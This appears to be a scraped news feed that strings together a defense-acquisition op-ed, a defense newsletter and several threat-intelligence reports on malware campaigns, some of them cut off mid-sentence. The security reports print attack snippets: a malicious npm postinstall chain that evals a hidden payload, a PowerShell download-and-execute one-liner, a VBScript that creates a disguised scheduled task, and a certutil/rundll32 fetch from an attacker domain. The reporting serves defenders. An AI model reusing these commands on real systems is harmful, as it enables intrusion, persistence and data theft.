• Warriors need critical skills that make them “competent, qualified, agile, professional, aggressive, innovative, risk-taking, apolitical,” Secretary Hegseth told senior officers last month. He could just as well have been talking about the department’s civilian acquisition workforce, who are vital to efforts to achieve strategic advantage over our adversaries.

    Developing these skills must start long before a new employee arrives at DOD. That’s why we created the Defense Civilian Training Corps, a scholarship-for-service program that helps undergraduate students learn the skills that will help them succeed as acquisition professionals. The Pentagon launched DCTC in 2023 to prototype a college-campus talent-development model; it currently operates at University of Arizona, North Carolina A&T State University, Purdue University, and Virginia Tech; and it will expand to six universities for the cohort graduating in 2027.

    While the program’s future is uncertain, what is certain is the critical need for a civilian workforce that embodies these skills. And for leaders to invest in their development.

    Our competitive edge in warfighting is the culture of mission command, which empowers disciplined initiative, rooted in trust and shared understanding within a commander’s intent. The defense acquisition business ensures warfighters have the capabilities they need when they need them. There, our competitive edge is the acquisition workforce’s understanding of best practices, and the ability and willingness to think critically to solve complex problems at speed.

    Day in and day out, acquisition professionals are required to make tough judgment calls; consider competing approaches; balance risk, cost, capability, and schedule; and develop strategies. Every one of these decisions is directly related to speeding capabilities to the warfighter, making warrior ethos as critical in the civilian workforce as on the battlefield.

    Every acquisition-policy reform effort in recent memory (and there have been dozens) has heralded our people as our greatest asset to achieving that reform. But each time, DoD has relied upon training—mostly on-the-job training—to equip the workforce with tools for change. We’ve failed to recognize that it’s not people who are our greatest asset, but how we empower those people.

    The way forward

    Our leaders need an acquisition workforce with a mindset that recognizes the inherent value of data, uses digital tools for rapid iteration, and collaborates across disciplines to find creative solutions to our hardest problems. The place to gain first exposure and practice these critical thinking skills is the university setting, where multidisciplinary teams can tackle real-life problems using principles from systems engineering, lean startup methodology, and design thinking.

    DCTC has done the work of researching the critical skills that DOD organizations need most and prototyping a program to develop them. It combines project-based learning in the classroom with hands-on summer internships that embed scholars in DOD teams. It is the education needed to position the civilian workforce to learn, unlearn, and relearn at the pace of today’s rapid cycles of technological evolution and policy reform—that is, to keep the defense acquisition business’ competitive edge.

    DCTC is a blueprint for a talent factory; now we must scale that factory. Fortunately, the cost is low, and dropping: the first cohort of 80 DCTC scholars graduated in May at a cost to the taxpayer of about $120,000 per student. As we prepare to expand to new campuses, we have already reduced the per-student cost, and are working to cut by more than 50%.

    The need for a new approach to training is urgent, and not just because of developments abroad. Today, the FAR is being overhauled and JCIDS dismantled as part of a generational effort to fundamentally change our culture from one that measures success by procedural compliance, to one that values risk-taking and creativity to achieve speed, flexibility, and lethality. But experience shows the culture will resist these changes—unless we also reform how we develop our workforce talent. We cannot rely on the training that got us here. As the Air Force’s acting acquisition executive, William Bailey, noted at the NDIA-ETI Emerging Technologies for Defense conference, progress will be made not through policy, but by people around a table.

    A civilian workforce educated and empowered to think critically and communicate effectively is the missing link to a warrior-ethos culture that will ensure our strategic competitive edge. Expanding investment in DCTC is crucial to ensuring that the civilian acquisition workforce can adapt to the challenges of today and tomorrow.

    Karen Thornton is a Fellow at the Acquisition Innovation Research Center, a member of the adjunct faculty at the George Washington University Law School, and a Director on the Procurement Round Table.

    John Willison is a Fellow at the Acquisition Innovation Research Center, as well as founder and president of J Willison Consulting, LLC, and a certified Executive Coach.

    The views presented are their own and do not necessarily represent the views of the Department of Defense (War).

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A new information-stealer has emerged targeting job seekers with a trojanized Node.js application named Chessfi.

    Delivered via a modified npm package hosted on the official repository, the malware blends two previously separate tools—BeaverTail and OtterCookie—into a unified JavaScript payload.

    Victims are lured through fake employment offers and asked to install the application under the guise of a coding assessment, unknowingly triggering malicious scripts that harvest credentials, cryptocurrency wallets and user activity.

    Cisco Talos analysts identified the campaign when investigating unusual outbound traffic from a compromised system.

    They found that a post‐installation script in the node-nvm-ssh package spawns a hidden child process that deobfuscates and evaluates a large JavaScript payload.

    Node-nvm-ssh infection path (Source – Cisco Talos)

    This payload merges BeaverTail’s browser extension enumeration and InvisibleFerret Python downloader with OtterCookie’s remote shell, file exfiltration, clipboard and now keylogging modules.

    Once executed, the combined malware establishes a connection to a command-and-control server over socket.io.

    The attacker can remotely issue commands, steal files matching a wide range of patterns—from .env and .docx to cryptocurrency extension directories—and execute shell commands.

    Meanwhile, the keylogging component captures every keystroke and takes periodic desktop screenshots before uploading them to the C2 server along with clipboard contents.

    Sustained network activity

    Infected systems show sustained network activity on high-numbered TCP ports, often 1418 for socket.io and 1478 for keylog uploads.

    The malware creates a temporary folder named windows-cache and writes keystrokes to 1.tmp every second, while screenshots are saved as 2.jpeg every four seconds.

    Using the Node.js packages node-global-key-listener, screenshot-desktop and sharp, the module configures listeners for key events and schedules screenshot captures, then bundles and sends the data to hxxp://172.86.88.188:1478/upload.

    The keylogger listens for the keyboard and mouse key presses and saves them into a file (Source – Cisco Talos)

    In addition to credential theft and remote shell access, the campaign’s infection mechanism employs a multi-stage chain to evade detection. After cloning the repository, a malicious postinstall script in package.json executes the skip script:

    "scripts": {
      "postinstall": "npm run test npm run transpile npm run skip"
    }

    The skip command invokes node testfixtures/eval, which by default loads index.js. That script spawns a detached child process running file15.js:

    const filePath = path.join(__dirname, 'node_modules', 'file15.js');
    const child = spawn(process.execPath, [filePath], { detached: true, stdio: 'ignore' });

    Finally, file15.js reads and evaluates the content of test.list using eval, revealing the combined BeaverTail and OtterCookie modules:

    const fs = require('fs');
    const path = require('path');
    const filePath = path.join(__dirname, 'test.list');
    fs.readFile(filePath, 'utf8', (err, data) => { eval(data); });

    This convoluted chain—cloning a Git repository, running benign-looking npm scripts, spawning hidden processes and dynamically evaluating an obfuscated payload—underscores the sophisticated infection mechanism.

    By merging BeaverTail’s stealthy Python payload downloader and OtterCookie’s modular information-stealer, Famous Chollima has crafted a versatile malware that leverages familiar developer workflows to compromise unsuspecting victims.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post North Korean Hackers Using Malicious Scripts Combining BeaverTail and OtterCookie for Keylogging appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Air Force cancels plans to create a command focused on competing with China. Defense One’s Thomas Novelly: “Ending the creation of a permanent Integrated Capabilities Command—a major command slated to be led by a three-star general focused on modernizing and prioritizing the service’s future acquisitions—reverses a key initiative by former Air Force Secretary Frank Kendall.” 

    A provisional ICC was established in November to help lift acquisition responsibility from major commands to help them focus on other priorities. But the effort was paused by Defense Secretary Pete Hegseth in February. On Wednesday, service officials said the ICC’s responsibilities will by April 1 be folded into the existing Air Force Futures organization. Known as A5/7, it will gain a “Chief Modernization Officer” focused on strategy and force design, mission integration, capability development, and modernizing the service’s platforms. 

    Defense budget experts weren’t surprised by the decision to end the ICC, saying it followed a trend of the Air Force casting aside parts of the Biden-era reorganization plan. “This is really a course correction on the whole reorganization that Frank Kendall put in place,” said Todd Harrison, a senior fellow at the American Enterprise Institute. Novelly has more, here.

    The Army’s new tank will roll out a decade early, its manufacturer said Wednesday. Last year, service acquisition leaders shifted course when they awarded the contract for the M1E3 tank. “Rather than pick out every single communications system and sensor that would go into the next Abrams for the rest of its service life, the Army is opting for an open system that will allow new software to be plugged in as needed,” Defense One’s Meghann Myers reported off comments by Danny Deep, General Dynamics’ executive vice president for global operations. That means soldiers are expected to be riding in the M1E3 next year, well ahead of the tank's planned 2030s arrival. Read on, here.

    Additional reading: 


    Welcome to this Thursday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Ben Watson and Bradley Peniston. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. On this day in 1962, the Cuban missile crisis began. 

    Trump 2.0

    Developing: President Trump now seems to want to go to war to implement regime change in Venezuela. U.S. officials told the New York Times that the White House “has secretly authorized the C.I.A. to conduct covert action in Venezuela…stepping up a campaign against Nicolás Maduro, the country’s authoritarian leader.” 

    “We are certainly looking at [airstrikes on Venezuelan] land now, because we’ve got the sea very well under control,” Trump told reporters after confirming the Times reporting Wednesday. 

    To be clear, “The Trump administration’s strategy on Venezuela, developed by Secretary of State Marco Rubio, with help from John Ratcliffe, the C.I.A. director, aims to oust Mr. Maduro from power,” U.S. officials told the Times.

    By the way: American B-52 bombers were spotted in the air near Venezuela on Wednesday, according to public flight-tracking sites, the UK Defence Journal reported. On the one hand, “The flight profile is somewhat consistent with long-range training and deterrence patrols routinely conducted by B-52s from Barksdale Air Force Base across the Caribbean.” However, “The flight path brought the bombers close to La Orchila and Gran Roque, both Venezuelan islands with military facilities,” which along with their “visibility on open tracking platforms suggested a deliberate signalling exercise.”Trump also said he’s ordered the military to attack those small boats without due process—killing more than two dozen people in at least six watercraft to date—because prior U.S. Coast Guard interdictions of alleged drug traffickers “never worked when you did it in a very politically correct manner.”  

    Reminder: Neither the White House nor the Defense Department has yet offered proof that any of the six boats it has destroyed were in fact trafficking drugs, insisting instead that unreleased “intelligence” confirms their allegations.  

    Sen. Jeanne Shaheen, D-N.H., ranking member of the Foreign Relations Committee: “I support cracking down on the cartels and traffickers. But the Trump Administration’s authorization of covert C.I.A. action, conducting lethal strikes on boats and hinting at land operations in Venezuela slides the United States closer to outright conflict with no transparency, oversight or apparent guardrails. The American people deserve to know if the Administration is leading the U.S. into another conflict, putting servicemembers at risk or pursuing a regime-change operation.” 

    For what it’s worth, Trump promised during last year’s presidential campaign that he was “not going to start a war.” He also promised to end Russia’s Ukraine invasion in a single day, to end inflation, and lower grocery prices for Americans. But nine months into his second term, none of those three promises have materialized. He and Republicans in Washington have, however, initiated what Trump promises will be the largest mass deportation operation in history, and those operations—as predicted here, here, here, and here, e.g.—have worsened the economic outlook for everyday Americans and slowed the global economy, according to the International Monetary Fund’s latest forecast

    As Ukraine’s president heads to the White House Friday, Spain is facing a new threat from its chief NATO ally in Washington. “Spain was the only member of the 32-nation alliance not to commit to increasing military spending to 5% of GDP,” Reuters reported Tuesday. The western European nation is currently spending 1.3% on defense, with a promise to raise that number to 2% by the end of the year. 

    “I'm not happy with Spain…I was thinking of giving them trade punishment through tariffs because of what they did, and I think I may do that,” Trump suggested to reporters on Tuesday. Another possible response from Trump “would be moving the naval and air bases the US has in southern Spain to Morocco—an idea floated by former Trump official Robert Greenway—which would damage the local economies through the loss of thousands of indirect jobs,” al-Jazeera reports

    Madrid’s reax: “We are committed to the defense, to the security of NATO and, at the same time, we are equally committed to the defense of our welfare state,” Prime Minister Pedro Sánchez said after Trump’s tariff threat. 

    Semi-related new polling: “Far more Americans think the United States should mainly make important foreign policy decisions with major allies (60%) versus on its own (21%),” the Chicago Council announced in a new report published Tuesday. 

    Also notable: “The highest levels of Americans yet recorded in Chicago Council polling think US security alliances in Europe (68%), Asia (72%), and the Middle East (67%) benefit the United States alone or the United States along with its regional allies,” the Council’s pollsters write. Read more, here.

    Additional reading:

    At the Pentagon

    Most of the reporters who cover the Pentagon turned in their access badges on Wednesday afternoon rather than agree to new reporting rules. Associated Press: “News outlets were nearly unanimous in rejecting new rules imposed by Defense Secretary Pete Hegseth that would leave journalists vulnerable to expulsion if they sought to report on information—classified or otherwise—that had not been approved by Hegseth for release.” Hegseth has called the new rules “common sense” to help regulate what Trump has called a “very disruptive” press. More, here. (Defense One reporters were among those who declined to sign the Pentagon’s new agreement; the publication co-signed a statement with several other defense-oriented newsrooms, here.)

    • Read the Pentagon’s agreement, annotated by the New York Times, here.

    “[M]ake no mistake, today, Oct. 15, 2025 is a dark day for press freedom that raises concerns about a weakening U.S. commitment to transparency in governance, to public accountability at the Pentagon and to free speech for all,” the Pentagon Press Association said in a statement Wednesday. Trump’s Defense Department “did this because reporters would not sign onto a new media policy over its implicit threat of criminalizing national security reporting and exposing those who sign it to potential prosecution.” Nevertheless, the group added, “The Pentagon Press Association's members are still committed to reporting on the U.S. military.” 

    Sen. Tammy Duckworth, Army veteran and Democrat from Illinois: “The American people deserve transparency from their government—especially from an Administration that brags about being ‘the most transparent Administration in history’ and from a department with a nearly $1 trillion budget funded by taxpayer dollars.” 

    “You don’t hide and avoid accountability when you’re proud of what you’re doing,” Duckworth said. “You hide when you know what you’re doing is wrong. These sort of un-American restrictions on the free press could be expected from an authoritarian regime, but Pete Hegseth should know they simply have no place—and are not necessary—from the United States government.”

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A threat actor with ties to the Democratic People’s Republic of Korea (aka North Korea) has been observed leveraging the EtherHiding technique to distribute malware and enable cryptocurrency theft, marking the first time a state-sponsored hacking group has embraced the method. The activity has been attributed by Google Threat Intelligence Group (GTIG) to a threat cluster it tracks as UNC5342,

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A financially motivated threat actor codenamed UNC5142 has been observed abusing blockchain smart contracts as a way to facilitate the distribution of information stealers such as Atomic (AMOS), Lumma, Rhadamanthys (aka RADTHIEF), and Vidar, targeting both Windows and Apple macOS systems. “UNC5142 is characterized by its use of compromised WordPress websites and ‘EtherHiding,’ a technique used

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybersecurity professionals are raising alarms over a new wave of phishing emails masquerading as breach notifications from LastPass.

    These messages warn recipients of an urgent account compromise and urge them to download a “security patch” to restore access.

    In reality, the downloadable file contains a sophisticated malware loader designed to harvest credentials and deploy additional payloads.

    The scheme has been active since early October and has already ensnared several enterprise users.

    The emails leverage familiar LastPass branding, complete with company logos and links that appear to direct victims to legitimate domains.

    However, closer inspection reveals subtle URL manipulations that redirect users to attacker-controlled servers hosting malicious executables.

    LastPass analysts identified the campaign after observing multiple users reporting unexpected login failures and anomalous network traffic shortly after clicking the links.

    Each phishing email attaches a ZIP archive named “LastPass_Security_Update.zip” containing an executable disguised as an MSI installer.

    When launched, the MSI drops a PowerShell script in the user’s AppData folder and executes it via a scheduled task.

    This script reaches out to a remote command-and-control server to download a second-stage payload, which is capable of keylogging, screenshot capture, and lateral movement within corporate networks.

    Infection Mechanism

    The core of the attack revolves around a crafted PowerShell command that downloads and executes the loader without writing the script to disk. A snippet of the obfuscated command is shown below:-

    IEX(New-Object Net.WebClient).DownloadString('http://malicious.example.com/loader.ps1')

    This one-liner uses IEX to execute the downloaded content directly in memory, evading most antivirus solutions.

    Phishing email (Source – LastPass)

    The loader then injects a DLL into svchost.exe to maintain persistence and bypass application whitelisting.

    This campaign underscores the importance of verifying email authenticity, employing multi-factor authentication, and monitoring for unusual PowerShell activity in enterprise environments.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Beware of Fake ‘LastPass Hack’ Emails Trying to Trick Users Into Installing Malware appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • An investigation into the compromise of an Amazon Web Services (AWS)-hosted infrastructure has led to the discovery of a new GNU/Linux rootkit dubbed LinkPro, according to findings from Synacktiv. “This backdoor features functionalities relying on the installation of two eBPF [extended Berkeley Packet Filter] modules, on the one hand to conceal itself, and on the other hand to be remotely

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Over the past month, a targeted campaign dubbed Operation Silk Lure has surfaced, exploiting the Windows Task Scheduler to deploy a novel variant of ValleyRAT.

    Emerging in mid-2025, the operation hinges on spear-phishing emails that carry malicious LNK attachments masquerading as candidate resumes.

    When victims open these attachments, a hidden PowerShell command initiates the download of a decoy document and two executables: a loader (keytool.exe) and its side-loaded DLL (jli.dll).

    Initial analysis reveals that the phishing lure is crafted for Chinese fintech and trading firms’ HR departments.

    The malicious LNK file contains an obfuscated PowerShell one-liner, which silently retrieves payloads from a command-and-control (C2) server hosted in the United States.

    Once executed, the dropper writes a VBScript named CreateHiddenTask.vbs into the user’s AppData folder, then runs it to establish persistence.

    Seqrite researchers noted that this script programmatically registers a daily scheduled task named “Security,” spoofing Microsoft Corporation as the author, and immediately deletes itself to hinder detection.

    Following the persistence step, the loader binary (keytool.exe) launches and uses DLL side-loading to execute jli.dll.

    This DLL locates an 8-byte marker in its own file, extracts the subsequent encrypted payload, and performs RC4 decryption with a hard-coded key.

    Infection chain (Source – Seqrite)

    The decrypted shellcode is injected directly into memory, establishing contact with the C2 server at 206.119.175.16 and beginning reconnaissance and exfiltration.

    Seqrite researchers noted that once inside, ValleyRAT engages in extensive data harvesting and defense-evasion maneuvers.

    It fingerprints the host—collecting CPU details, screen resolution, and NIC information—while checking for virtualization or known antivirus products via WMI queries.

    Detected security services, including 360Safe and Kingsoft, have their network connections forcefully terminated. All activities are logged and transmitted covertly over HTTPS, raising the risk of credential theft and corporate espionage.

    Infection Mechanism and Persistence

    A closer look at the infection chain uncovers the elegance of its persistence tactic. The VBScript used to register the scheduled task leverages COM interfaces to interact with the Task Scheduler.

    Below is the core snippet from CreateHiddenTask.vbs:-

    Set service = CreateObject("Schedule.Service")
    service. Connect
    Set rootFolder = service.GetFolder("\")
    Set taskDef = service.NewTask(0)
    With taskDef.RegistrationInfo
        .Author = "Microsoft Corporation"
    End With
    With taskDef.Triggers.Create(1)  ' DAILY trigger
        .StartBoundary = "2025-08-01T08:00:01"
        .DaysInterval = 1
    End With
    With taskDef.Actions.Create(0)   ' EXEC action
        .Path = ExpandEnvironmentStrings("%APPDATA%\keytool.exe")
    End With
    rootFolder.RegisterTaskDefinition "Security", taskDef, 6, "", "", 3

    Upon registration, the task executes keytool.exe every morning at 8:00 AM. This mechanism ensures the loader runs consistently, even after system reboots.

    By embedding author metadata and deleting the script, the threat actors blend into normal system activity, complicating forensic investigations.

    The combination of LNK-based initial compromise, VBScript persistence, and DLL side-loading makes Operation Silk Lure a sophisticated threat demanding updated hunting signatures and vigilant monitoring of scheduled tasks.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Operation Silk Lure Weaponizing Windows Scheduled Tasks to Drop ValleyRAT appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Qilin ransomware group has emerged as one of the most prolific and dangerous threat actors in the cybersecurity landscape, exploiting sophisticated bulletproof hosting infrastructure to conduct devastating attacks on organizations across multiple sectors.

    Operating under a Ransomware-as-a-Service (RaaS) model, Qilin first surfaced in mid-2022 under the name “Agenda” before rebranding later that year.

    The group has gained widespread notoriety for targeting healthcare organizations, government entities, critical infrastructure operators, and asset management firms worldwide.

    Most notably, the gang recently claimed responsibility for the September 2025 ransomware attack that crippled operations at Asahi Group Holdings, Japan’s largest beverage manufacturer, forcing production shutdowns at most of its 30 factories for nearly two weeks.

    The ransomware operation maintains variants written in both Golang and Rust programming languages, demonstrating technical versatility that enables cross-platform attacks.

    According to the Health Sector Cybersecurity Coordination Center, Qilin gains initial access through spear phishing campaigns and leverages Remote Monitoring and Management (RMM) tools alongside other common penetration tools to establish persistence within compromised networks.

    Qilin blog (Source – Resecurity)

    The group practices double extortion tactics, encrypting victim data while simultaneously exfiltrating sensitive information to pressure organizations into paying ransoms.

    Their RaaS platform provides affiliates with user-friendly panels to configure attacks, manage victims, and negotiate ransoms, while maintaining a Data Leak Site on the Tor network for publishing stolen data.

    Resecurity analysts noted that Qilin’s operations are deeply intertwined with an underground bulletproof hosting conglomerate that has origins in Russian-speaking cybercriminal forums and Hong Kong.

    The threat actors have established strong connections to rogue hosting providers that enable them to operate with minimal oversight and maximum resilience against law enforcement intervention.

    These bulletproof hosting services are incorporated in pro-secrecy jurisdictions and structured across complex webs of anonymous shell companies distributed geographically, creating safe havens for cybercriminals who wish to remain anonymous.

    The group’s infrastructure relies heavily on providers such as Cat Technologies Co. Limited, a Hong Kong-based entity that shares business addresses with related companies including Starcrecium Limited in Cyprus and Chang Way Technologies Co. Limited.

    Resecurity researchers identified that these entities serve as official representatives for Russia-based hosting provider Hostway.ru, which operates under the legal entity OOO “Information Technologies”.

    Network analysis revealed that Qilin ransomware operations utilize IP addresses associated with these providers, with frequent changes to complicate tracking efforts.

    In April 2024, researchers observed the group’s Data Leak Site mentioning IP addresses 176[.]113[.]115[.]97 and 176[.]113[.]115[.]209, both associated with Cat Technologies Co. Limited.

    The business model of these bulletproof hosting providers thrives on zero Know Your Customer (KYC) protocols and complete absence of due-diligence checks.

    They offer services ranging from $95 to $500 and beyond, depending on server configurations, with specialized offerings for mass scanning capabilities featuring network bandwidth up to 10 Gbps. One prominent provider, BEARHOST Servers—also known as Underground and Voodoo Servers—has been advertising directly on Qilin’s “WikiLeaksV2” platform.

    Historical passive DNS records show this operation was hosted at IP 31[.]41[.]244[.]100 associated with Red Bytes LLC in Saint Petersburg, Russia.

    The service has maintained active accounts on multiple underground forums including XSS and Exploit since at least 2019.

    Bulletproof Hosting Infrastructure and Operational Resilience

    The bulletproof hosting infrastructure supporting Qilin ransomware operations demonstrates remarkable resilience through sophisticated corporate structures designed to evade detection and law enforcement action.

    Multiple legal entities share common directors and addresses, creating a complex web that shields the true operators from accountability.

    Corporate records reveal that Mr. Lenar Davletshin serves as director of numerous entities including Chang Way Technologies Co. Limited, Starcrecium Limited, OOO “Red Byte,” OOO “Information Technologies,” OOO “Hostway,” OOO “Hostway Rus,” OOO “Triostars,” and OOO “F1″—all registered in Russia, Cyprus, and Hong Kong.

    These hosting networks are frequently implicated in command-and-control server operations for various malware families including Amadey, StealC, and CobaltStrike.

    The IP address 85.209.11.79, associated with this infrastructure, has been reported over 11,346 times to AbuseIPDB for malicious activity including exploit probing and network scanning.

    The interconnected nature of these providers was further confirmed when U.S. Treasury Department sanctions in July 2025 targeted the Aeza Group for providing bulletproof hosting services to cybercriminals, specifically aiding ransomware groups like BianLian and hosting illicit drug markets such as BlackSprut.

    Following increased scrutiny and multiple abuse complaints, BEARHOST announced in late December 2024 that their service would transition to private mode, accepting new customers only through vetting and invitations from existing clients.

    This operational security adjustment represents a common pattern among established underground vendors who have built significant customer bases and seek to minimize exposure to law enforcement and cybersecurity researchers.

    In May 2025, BEARHOST rebranded as “voodoo_servers” before ultimately announcing termination of services due to “political reasons,” executing what appears to be an exit scam that left customers without server access or fund returns while the underlying legal entities continued operations.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Qilin Ransomware Using Ghost Bulletproof Hosting to Attack Organizations Worldwide appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In recent months, a new advanced persistent threat (APT) group known as Mysterious Elephant has emerged as a formidable adversary targeting government and diplomatic institutions across the Asia-Pacific region.

    First identified by Kaspersky’s Global Research and Analysis Team (GReAT) in 2023, the group has continued to refine its toolkit, employing both custom-built malware and modified open-source utilities to evade detection and maintain long-term access.

    Early indicators pointed to simple phishing lures delivering weaponized documents, but the latest campaign exhibits a significant evolution in both delivery mechanisms and post-exploitation tooling.

    Initial incursions leveraged spear-phishing emails embedding malicious Office documents exploiting CVE-2017-11882.

    Upon user interaction, these documents drop a lightweight PowerShell loader that retrieves more complex payloads from attacker-controlled infrastructure. This loader, dubbed BabShell, serves as the foundation of the threat actor’s modular framework.

    As the campaign progressed into 2025, Mysterious Elephant integrated a second-stage loader, MemLoader HidenDesk, to inject remote access trojans directly into memory, reducing forensic artifacts on disk.

    Securelist analysts noted that subsequent phases of the operation focus on exfiltrating sensitive WhatsApp data, including documents, images, and archives, using custom exfiltrators named Uplo Exfiltrator and Stom Exfiltrator.

    Mysterious Elephant spear phishing email (Source – Securelist)

    These components encode stolen data with XOR-based obfuscation before transmitting it via HTTP to wildcard DNS domains such as storycentral.net and monsoonconference.com.

    By leveraging legitimate domains and HTTPS, the group blends malicious traffic with normal corporate web use, complicating network-based detection.

    # Download and execute BabShell payload
    certutil -urlcache -f "hxxp://storycentral.net/BabShell.dll" BabShell.dll
    rundll32.exe BabShell.dll,EntryPoint

    Infection Mechanism

    The infection chain begins with a spear-phishing email containing a seemingly benign meeting invitation in an RTF document.

    When opened, the document triggers a memory corruption vulnerability in the Office Equation Editor (CVE-2017-11882), silently spawning a PowerShell process.

    This PowerShell instance operates in hidden mode (-nop -w hidden) and uses .NET’s WebClient class to fetch the BabShell DLL loader.

    Once loaded, BabShell decrypts its embedded configuration, which includes C2 URLs and module names, before invoking its EntryPoint export to establish a heartbeat channel.

    After initial beaconing, BabShell fetches the MemLoader HidenDesk module, injecting it into a system service process.

    This in-memory loader parses a custom packet format, decompresses the RAT payload (a variant of Remcos), and transfers execution to the newly mapped code.

    By avoiding disk writes, MemLoader HidenDesk significantly diminishes kinetic evidence, allowing Mysterious Elephant to navigate laterally and harvest target data undetected.

    The group’s use of open-source codebases, combined with proprietary modifications, underscores both resourcefulness and technical sophistication.

    Through these multi-stage infection tactics, Mysterious Elephant continues to refine its approach, demanding equally adaptive defense strategies from security teams tasked with safeguarding sensitive information.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Mysterious Elephant APT Hackers Infiltrate Organization to Steal Sensitive Information appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶